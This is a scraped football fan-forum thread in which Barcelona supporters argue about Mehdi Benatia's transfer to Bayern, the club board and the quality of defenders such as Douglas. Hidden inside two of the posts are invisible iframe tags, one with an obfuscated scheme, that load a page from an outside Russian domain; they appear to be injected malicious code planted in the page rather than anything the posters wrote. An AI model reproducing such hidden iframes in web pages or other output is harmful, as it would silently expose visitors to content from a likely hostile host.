Mehdi Benatia

Icarium

Lifestealer
Bayern gets what they want and that too for the best possible amount. Seriously we should learn some tricks from them. Apparently we are losing Reus to Bayern too. Not that it would affect barca but i don't want Reus to go to bayern. I don't mind buying him to stop that from happening.

I

instinct

Someone needs to ask Zubi to explain this or ask if he had brain damage. Socios are to blame as well since they apperantly dont mind al the mistakes the board made and how the reputation of barca have been tarnished.

Reputation? Socios? What does that have to do with the Benatia transfer to Bayern?

Sid90

Douglas is a no name "defender", who can't defend, btw.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Sarcasm mate, anyways I want to say that we are the whiniest bunch of fans ever walked on this planet. Taking everything for granted, a team which consists of Messi, Neymar, Suarez, Iniesta, Rakitic, busquets, Masch, Ter Stegen, alba ect ect ect shouldn't whine about defenders when we have fine quality in Barta, Mathieu, Pique and Vermalenan(Not the best but a good bunch none the less). Seriously please don't whine and before that we should look at the giants such as AC Milan and Man u then complain about quality.

NeyMesSis

Sarcasm mate, anyways I want to say that we are the whiniest bunch of fans ever walked on this planet. Taking everything for granted, a team which consists of Messi, Neymar, Suarez, Iniesta, Rakitic, busquets, Masch, Ter Stegen, alba ect ect ect shouldn't whine about defenders when we have fine quality in Barta, Mathieu, Pique and Vermalenan(Not the best but a good bunch none the less). Seriously please don't whine and before that we should look at the giants such as AC Milan and Man u then complain about quality.

+10000

Cule4life

The Culest
Another sad day in the history of Barca, the greatest club in the world being destroyed by possibly the biggest bunch of idiotic crooks to walk the face of the earth . Only winning La Liga and CL and the Board getting kicked out will cheer me up now

tumblr_inline_mz9lkmMM4a1qk3ug7.gif

Luftstalag14

Culé de Celestial Empire
Enough whining already.

We saw this coming. Lucho didn't go for him. Ask him why.

Now deal with it. We still had a pretty good transfer window if you ask me.

F

Flavia

Milan's been on a downer for a long time, I surely don't want Barça to follow their footsteps. Douglas is just not good enough, and I know this because I'm brazilian and have watched him play.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Doobs

The Messiah
Another sad day in the history of Barca, the greatest club in the world being destroyed by possibly the biggest bunch of idiotic crooks to walk the face of the earth . Only winning La Liga and CL and the Board getting kicked out will cheer me up now

The Verminator is here. No reason to fear.

I

instinct

Why will the club be destroyed only because we didn't sign Benatia? ridiculous statement

Home of Barca Fans